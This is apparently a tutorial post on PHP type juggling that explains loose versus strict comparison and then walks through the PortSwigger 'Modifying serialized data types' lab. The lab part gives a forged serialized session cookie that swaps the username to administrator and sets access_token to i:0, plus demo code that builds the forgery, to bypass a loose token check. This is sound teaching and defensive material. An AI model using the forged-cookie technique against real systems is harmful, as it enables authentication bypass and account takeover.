What is Type Juggling:

PHP is a dynamically typed language: a variable's type is decided by the value assigned to it, not declared up front. If an integer is assigned to a variable it becomes an integer; if a string is assigned, it becomes a string. Type juggling is the related behaviour in which PHP silently converts a value from one type to another when an operation, such as a comparison, expects a different type.

PHP has two comparison modes: loose (== and !=) and strict (=== and !==).

A type juggling vulnerability arises when a loose comparison (== or !=) is used where a strict comparison (=== or !==) was needed, typically on security-sensitive values such as passwords, tokens or hashes.

PHP comparison: Strict

A strict comparison works like a loose comparison except that neither operand is implicitly converted before the comparison. If the two values have different types they are considered not equal, so "5" === 5 is FALSE.

(Figure: PHP strict comparison table)

PHP comparison: Loose

(Figure: PHP loose comparison table)

A loose comparison first converts both operands to a common, comparable type and then compares them. When a string is compared with a number, PHP attempts to convert the string to a number and then performs a numeric comparison.

for example:

<?php
$int = 5;
$str = "5";
if ($str == $int) {   // "5" is converted to the integer 5 before the comparison
    echo "TRUE";
}

output:

TRUE

because PHP converts the string "5" to the integer 5 and compares it with $int.

Other examples (results as produced by PHP 7; see the caveat below):

"00" == 0 → TRUE (numeric string, compared as 0 == 0)

"0abc" == 0 → TRUE (leading-numeric string, the trailing "abc" is dropped)

"1abc" == 1 → TRUE (same rule)

"abc" == 0 → TRUE (non-numeric string converts to 0)

Caveat: PHP 8.0 changed these rules. A numeric string such as "00" is still compared numerically, but a non-numeric or leading-numeric string ("abc", "0abc", "1abc") is no longer converted to a number; instead the number is converted to a string and the two are compared as text, so the last three comparisons are FALSE on PHP 8. Fuller tables of these conversions are in the OWASP "PHP Magic Tricks: Type Juggling" paper and the PayloadsAllTheThings Type Juggling page listed in the references.
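To see the loose and strict results side by side, here is an added example (not code from the original post). It runs the pairs from the list above plus two extra rows that matter for token checks: a pair of "0e..." strings (both numeric, so they compare equal on every PHP version) and a hex-looking string. The pairs are constructed for the demo; the script prints the PHP version it ran under because the == column differs between PHP 7 and PHP 8.

```php
<?php
// Added example (not from the original post): how PHP's loose (==) and
// strict (===) comparisons treat string/number pairs. The == results for
// non-numeric and leading-numeric strings changed in PHP 8.0, so the
// script records which version it ran under.
declare(strict_types=1);

/** Return one row per pair with the loose and strict results as TRUE/FALSE. */
function compareAll(array $pairs): array
{
    $out = [];
    foreach ($pairs as [$a, $b]) {
        $out[] = [
            'left'   => var_export($a, true),
            'right'  => var_export($b, true),
            'loose'  => ($a == $b)  ? 'TRUE' : 'FALSE',   // operands are type juggled
            'strict' => ($a === $b) ? 'TRUE' : 'FALSE',   // no conversion at all
        ];
    }
    return $out;
}

// Constructed test pairs (these are demo values, not taken from any real system).
$pairs = [
    ["5",      5],         // numeric string: TRUE under == on every version
    ["00",     0],         // numeric string: TRUE under == on every version
    ["0abc",   0],         // leading-numeric: TRUE on PHP 7, FALSE on PHP 8
    ["1abc",   1],         // leading-numeric: TRUE on PHP 7, FALSE on PHP 8
    ["abc",    0],         // non-numeric:     TRUE on PHP 7, FALSE on PHP 8
    ["0e1234", "0e5678"],  // two numeric strings in scientific notation: 0.0 == 0.0, TRUE everywhere
    ["0x1A",   26],        // hex strings are NOT numeric strings: FALSE under == since PHP 7.0
];

printf("PHP %s\n", PHP_VERSION);
printf("%-12s %-12s %-6s %-6s\n", 'left', 'right', '==', '===');
foreach (compareAll($pairs) as $row) {
    printf("%-12s %-12s %-6s %-6s\n", $row['left'], $row['right'], $row['loose'], $row['strict']);
}
```

The "0e1234" == "0e5678" row is the same mechanism behind the well-known "magic hash" bypasses: when both sides are hashes that happen to start with "0e" followed only by digits, a loose comparison treats both as the float 0 and reports them equal, even on PHP 8. The === column is FALSE for every mixed-type row, which is exactly why strict comparison is the fix.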

The Risk:

1- unauthorized access or authentication bypass

2- data manipulation

Solving the lab: Modifying serialized data types (PortSwigger Web Security Academy)


First, configure the browser to use the proxy and open the lab.

After logging in to the account and mapping the application, go to the requests in the proxy's HTTP history and analyze them.


Nothing in the request bodies looked interesting, but every request carries a session cookie.

URL-decoding the cookie value and then base64-decoding it yields a serialized PHP object:

O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"p3frad2r93cvh95lxw9pavw1m272mzne";}

Let's modify the serialized object: change the username wiener to administrator and update the string length prefix from s:6 to s:13 so that the object still parses:

O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"p3frad2r93cvh95lxw9pavw1m272mzne";}

Base64-encode and URL-encode the modified object, put it back in the session cookie and resend the request.

Unfortunately the response is an Internal Server Error: the access_token in the cookie still belongs to wiener, so it does not match the token stored for administrator.


So let's modify the access_token itself. Replace the 32-character string with the integer 0 and change the data type from s (string) to i (integer), to take advantage of a possible loose comparison (==) on the server side: if the check is loose, it can be passed without knowing the real token. The attribute count stays 2, and an integer value carries no length prefix:

O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

Under loose comparison on PHP 7 and earlier, a string that does not start with a digit is converted to 0 when compared with an integer, so 0 == "<administrator's token>" evaluates to TRUE for any stored token that does not begin with a non-zero digit. On PHP 8 the same comparison is done as text and fails, so this trick depends on the server's PHP version.

Encode the object as base64, then URL-encode it, put it in the session cookie and send the request.

And with that, I had access to the administrator account.


After deleting the user carlos from the admin panel, the lab is solved.
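The whole procedure above, as an added example that is not the lab's own code: it rebuilds wiener's cookie from the post, decodes it the way the lab expects (URL decode, then base64 decode, then unserialize), forges the username and the integer token, re-encodes the cookie, and then shows why the forged cookie passes a loose token check but not a strict one. The class name User, the property names and wiener's token come from the post; the stored administrator token and both check functions are assumptions made for the demo (the post infers the loose check from the lab's behaviour, it does not show the server code).

```php
<?php
// Added example (not the lab's own code): decode, forge and re-encode the
// session cookie, then compare a loose token check with a hardened one.
// Assumptions: the server-side check functions and the administrator's stored
// token are invented for this demo; the cookie format follows the post.
declare(strict_types=1);

class User
{
    public string $username;
    public $access_token;   // left untyped on purpose: the forged cookie makes it an int
}

/** Cookie format seen in the lab: urlencode(base64(serialize($user))). */
function decodeSession(string $cookie): User
{
    $raw  = base64_decode(urldecode($cookie), true);
    $user = unserialize($raw, ['allowed_classes' => ['User']]);
    if (!$user instanceof User) {
        throw new RuntimeException('cookie did not contain a User object');
    }
    return $user;
}

function encodeSession(User $user): string
{
    return urlencode(base64_encode(serialize($user)));
}

/** Vulnerable check (assumed): loose comparison, so 0 == "<token>" passes on PHP 7. */
function tokenValidLoose(User $user, string $storedToken): bool
{
    return $user->access_token == $storedToken;
}

/** Hardened check: require a string, then compare in constant time. */
function tokenValidStrict(User $user, string $storedToken): bool
{
    return is_string($user->access_token)
        && hash_equals($storedToken, $user->access_token);
}

// Constructed input: wiener's session rebuilt from the values in the post.
$wiener = new User();
$wiener->username     = 'wiener';
$wiener->access_token = 'p3frad2r93cvh95lxw9pavw1m272mzne';
$cookie = encodeSession($wiener);

// Step 1: decode and inspect the cookie.
$user = decodeSession($cookie);
echo serialize($user), "\n";
// O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"p3frad2r93cvh95lxw9pavw1m272mzne";}

// Step 2: forge it. serialize() writes the new length (s:13) and the int (i:0) for us.
$user->username     = 'administrator';
$user->access_token = 0;
$forged = encodeSession($user);
echo serialize($user), "\n";
// O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

// Step 3: what the server would see. The real admin token is unknown to the
// attacker; this placeholder is an assumption and only needs to not start
// with a non-zero digit for the loose check to pass on PHP 7.
$adminTokenOnServer = 'assumed-admin-token-value';
$check = decodeSession($forged);
var_dump($check->username);                               // string(13) "administrator"
var_dump(tokenValidLoose($check, $adminTokenOnServer));   // bool(true) on PHP < 8.0, bool(false) on PHP >= 8.0
var_dump(tokenValidStrict($check, $adminTokenOnServer));  // bool(false) on every version
```

Two design points. First, serialize() is used to build the forged object instead of hand-editing the string, which avoids the length-prefix mistakes that produce the Internal Server Error seen earlier. Second, the hardened check does not just swap == for ===: it rejects any non-string token up front and then uses hash_equals(), so a mistyped value can never reach the comparison and the comparison itself does not leak timing information.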


Mitigation:

1- Use strict comparison (=== and !==) instead of loose comparison (== and !=) for security-sensitive checks, and compare secrets such as tokens and hashes with hash_equals() rather than either operator.

2- Validate the type and format of input before using it, and do not unserialize() untrusted data at all; if deserialization is unavoidable, restrict it with the allowed_classes option and prefer a data-only format such as JSON.

3- Regular code review, with loose comparisons on authentication and authorization paths treated as findings.

Thank you for reading.


References:

https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md